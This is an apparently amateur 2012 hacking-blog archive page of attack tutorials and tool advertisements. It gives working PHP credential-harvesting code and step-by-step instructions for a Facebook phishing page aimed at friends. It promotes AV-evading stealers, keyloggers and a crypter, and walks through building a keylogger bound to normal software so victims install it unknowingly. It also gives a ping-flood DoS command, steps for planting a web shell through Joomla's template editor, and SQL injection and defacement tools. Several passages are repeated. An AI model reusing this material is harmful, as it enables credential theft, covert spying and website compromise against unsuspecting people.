Home » Archives for August 2012
Monday, 27 August 2012
Hacking For Dummies [Excellent book for Ethical hacking]
It's bad enough when a hack occurs-stealing identities, bank accounts,
and personal information. But when the hack could have been prevented by
taking basic security measures-like the ones described in this
book-somehow that makes a bad situation even worse. This beginner guide
to hacking examines some of the best security measures that exist and
has been updated to cover the latest hacks for Windows 7 and the newest
version of Linux.
Sunday, 26 August 2012
How to Make Facebook Phising page
here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files
Step 1. Creating a login.php file>
Open notepad and paste the following lines there... as save it with name login.php
Code Updated: By mistake i hv missed one line in php file, i hv add that line now. Sorry for inconvenience.
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....
check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)
2.2. Now open the htm file with notepad(right click> open with> notepad)...
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact type of line as shown in screen shot.... near which you will find a
tag and method="post" something like that.
2.3. Now replace the url written after action with the name of your php file created in step 1.
Now your fake page is ready....
Save it with name index.html
Step 3: Uploading on a Free Hosting Site:
Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading on http://www.yourfreehosting.net/.
1. first of all sign up for a free hosting Account.
Note: yourfreehosting.net is now not available for free, you can create account on http://www.000webhost.com/473091.html .To know how to create account there, check post "How to create a FREE webhosting Account"
2. After creating Account, login there, then go to control pannel> File Manager.
Save it with name index.html
Step 3: Uploading on a Free Hosting Site:
Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading on http://www.yourfreehosting.net/.
1. first of all sign up for a free hosting Account.
Note: yourfreehosting.net is now not available for free, you can create account on http://www.000webhost.com/473091.html .To know how to create account there, check post "How to create a FREE webhosting Account"
2. After creating Account, login there, then go to control pannel> File Manager.
3. Now remove the preexisting index.html file.
4. Now click on upload files and then upload there index.html and login.php
4. Now click on upload files and then upload there index.html and login.php
5. Now click on New directory to make a new folder there and name it "Welcome to Facebook_files"
6. Now open the directory
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.
Now your phishing page is ready to hack ;)
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and their password will be saved in that file.
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and their password will be saved in that file.
Saturday, 25 August 2012
Friday, 24 August 2012
Rapzo Logger v1.5
Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD
[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip
Features [25]
* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers
DOWNLOAD
Sharp Stealer 2.5
Steals:
• Firefox (All versions, included 3.5) New
• Internet Explorer (All versions, included 8) New
• Google Chorme (All versions)New
• MSN Messenger / Live Messenger (All versions)
• Yahoo Messenger (All versions)
• Yahoo ETS
• Pidgin / Gaim
• No-Ip
• DynDNS
• FileZilla
• CD Keys
Features:
•Builder GUI coded in VB6
• Stub coded in VB6
• Stub size uncompressed: 64.0 KB (65,536 bytes
• Stub size compressed with UPX: 233.KB (237,568 bytes
•OS: NT/XP/Vista/W7 New
•FUD (Runtime and Scantime) Amazing! Paid Version Not Free
• Don't use external programs Important
• All strings encrypted
• Bypass UAC in Vista/W7 New
• Test URL function in the builder New
• Php log manager (With new features) New
• Melt (Self destruction) New
• All encrypted
• Good design
DOWNLOAD
• Firefox (All versions, included 3.5) New
• Internet Explorer (All versions, included 8) New
• Google Chorme (All versions)New
• MSN Messenger / Live Messenger (All versions)
• Yahoo Messenger (All versions)
• Yahoo ETS
• Pidgin / Gaim
• No-Ip
• DynDNS
• FileZilla
• CD Keys
Features:
•Builder GUI coded in VB6
• Stub coded in VB6
• Stub size uncompressed: 64.0 KB (65,536 bytes
• Stub size compressed with UPX: 233.KB (237,568 bytes
•OS: NT/XP/Vista/W7 New
•FUD (Runtime and Scantime) Amazing! Paid Version Not Free
• Don't use external programs Important
• All strings encrypted
• Bypass UAC in Vista/W7 New
• Test URL function in the builder New
• Php log manager (With new features) New
• Melt (Self destruction) New
• All encrypted
• Good design
DOWNLOAD
Setup Ardamax Keylogger To Hack ID's [Video]
Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.
XSS,RFI LFI and SQLI Attacks [Ebooks]
Hello Guyz toady i m sharing 3 ebooks of XSS ,LIF RFI and SQLI Explained how thery works and how to attack a site .
XSS Guide
LFI and RFI Guide
SQL Injection Guide
XSS Guide
LFI and RFI Guide
SQL Injection Guide
Thursday, 23 August 2012
Tabnapping [New Type Of Phising]
Tabnapping Is the new type of phising attack
Phising : it is fake page of facebook which is sent to victim . and he logins like facebook then its email and passowrd is sent to hosting of phising
Wednesday, 22 August 2012
Toxic Public Crypter [100% Fud]
Toxic Public Crypter 100% FUD
Runtime + Scantime + EOF Support
SCAN OF CYRPTED PRO RAT SERVER:
File Info
Report date: 2010-04-17 17:25:57 (GMT 1)
File name: Server.exe
File size: 440252 bytes
MD5 Hash: c69f927efed168b0f0d6abfacbbb30a7
SHA1 Hash: 1ecba9b18371428b178bad2de68491578ffe6ee9
Detection rate: 0 on 20 (0%)
Status: CLEAN
Detectionsa-squared - -Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org
Tuesday, 21 August 2012
Super Hide IP 3.2 [Crack Included]
Anonymous Surfing with Super Hide IP Protect your privacy on the Internet. Use Super Hide IP to surf anonymously, prevent hackers from monitoring your online activities or identity thieves from stealing your identity and other personal information, send anonymous email, and un-ban yourself from forums or restricted websites.
DDOS Attack [Kill the Site]
[Use VPN or Ip Hiding Tool to do following Action]
[Like HotSpot Shield or Super Hide IP]
DoS Attack Stands For Denial of Service Attack
What Is DoS?
A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)
Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.
How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com) [warning ! if u love urself . then dont even try to ddos on google]
It will show u ip of the site.
ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.
SITE-IP= Replace the **** with the ip address of the site u want to be attacked..
-w 0.00001 = It is the waiting time after one ping attack.
NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!
This All System Is Known As "PING OF DEATH"
Monday, 20 August 2012
How To Upload Shell In JOOMLA
Hello Guyz Today im sharing a tut How to Upload Shell In Joomla
1. Suppose we have an access to joomla admin.
2. Once you Login you see the below screen.
3. Then look for Extensions and in that Template Manager.
4. Once you click on that you will see all the templates installed on that site.
6. Once you click on beez you will see the following screen. now just click on edit html
8. Once you click on edit html you will see the following screen
see the red part /templates/beez/index.php that is the path of your shell
9. Now just paste your shell code over their and save it
10. Once you click on save. it will take you to page were it will show you Template source saved. you work is done
Once that is done you can access your shell. Path of the shell would be
www.site.com/templates/beez/index.phpHuge List Of SQL Dorks
Dorks Are very use ful to scan Vulnerable sites . So Today im giving you a list of dorks for you
So Enjoy guyz
Friday, 17 August 2012
How To Hack ID's With Rin Logger
DOWNLOAD RIN Logger
Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next
4. Now, enter the time duration between two emails. If you set it to 2 minutes, you will receive emails after every 2 minutes. Hit on Next.
5. Now, change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Startup”.
You can use all other options according to your needs. But, I am focusing on important aspects only. Hit on Next until you see this option:
6. Hit on “?” button besides every textbox to generate random product information. Hit on Next.
7. Now, hit on “Save As” and select the path where you want to save your keylogger server file. Click on “Compile”. Done!!!
That’s it. You have successfully created a keylogger server file. Now, simply send this file to your friend. You can use the Binder within this keylogger or can even opt for Iexpress binder to bind this keylogger server to any .exe file may be software or so. This will remove any chances of doubt on victim’s side.
Thus, the victim will run the file considering it as a normal software installation and during this process, our sent keylogger server will install itself silently in background without any victim’s knowledge.
After keylogger server installation, you will start receiving all victim passwords like this:
Thus, now you can easily hack Gmail account password of your friend. Cheers!!!
Z-A Pakistani SMS Bomber (Fast Speed)
Z-A's Pakistani SMS Bomber
Created By ME & Zaryab Jamil
Greets:-
Mudassar Nazar - Maher Bro - Zaryab Jamil
Nice Speed
Sms Counter
Thursday, 16 August 2012
How To make .exe file Icon Changer ||Visual Basic Tutorial||
Hello Guyz today i will tell u how to create an .EXE file Icon changer in Vb
1st of all open vb and create new Project
Now from Tool Box add following things
2 textboxes
3 buttons
1 openfiledialog
button1 = browse .exe file
button 2 = browse icon
button 3= Change Icon
textbox1 = .exe file location
textbox2 = ico file location
Now lets Start Coding
first double click on form1 and before
Public Class Form1
add this Code
Imports System.IOImports fLaSh.Dissembler
now Double Click on Button 1 and add this code
OpenFileDialog1.DefaultExt = "exe"
OpenFileDialog1.Filter = "exe files (*.exe)|*.exe"
OpenFileDialog1.FilterIndex = 1
If OpenFileDialog1.ShowDialog(Me) = DialogResult.OK Then
TextBox1.Text = String.Empty
TextBox1.Text = OpenFileDialog1.FileName
End If
then Double Click on button2 and add this code
OpenFileDialog1.DefaultExt = "ico"
OpenFileDialog1.Filter = "icon files (*.ico)|*.ico"
OpenFileDialog1.FilterIndex = 1
If OpenFileDialog1.ShowDialog(Me) = DialogResult.OK Then
TextBox2.Text = String.Empty
TextBox2.Text = OpenFileDialog1.FileName
End If
Now double Click on button3 and add this code
If TextBox1.Text = "" Then Exit Sub
If TextBox2.Text = "" Then Exit Sub
Dim oIconFilenathu As New IconFile(TextBox2.Text)
Dim groupIconResource As GroupIconResource = oIconFilenathu.ConvertToGroupIconResource()
groupIconResource.SaveTo(TextBox1.Text)
MsgBox("Icon Changed Successfully!")your Icon Changer Is Ready
Comment Here if u have difficulty :)
Wednesday, 15 August 2012
Havij Sql Injection + Upload Shell + Deface Site [full tutorial]
Things Need
1. Havij Automated Sql injection Tool DOWNLOAD From Here
2. A Shell DOWNLOAD SHELL
3. Security [ use Tor browser to browse anonymously DOWNLOAD TOR
Some Best Important ||Shells||
which are very useful to deface a site
1. c100
2. B374K
3. WSO Shell
4. Madspot shell
5. Priv8 Shell [ used to get wordpress or joomla admin login in symlink]
Subscribe to:
Posts (Atom)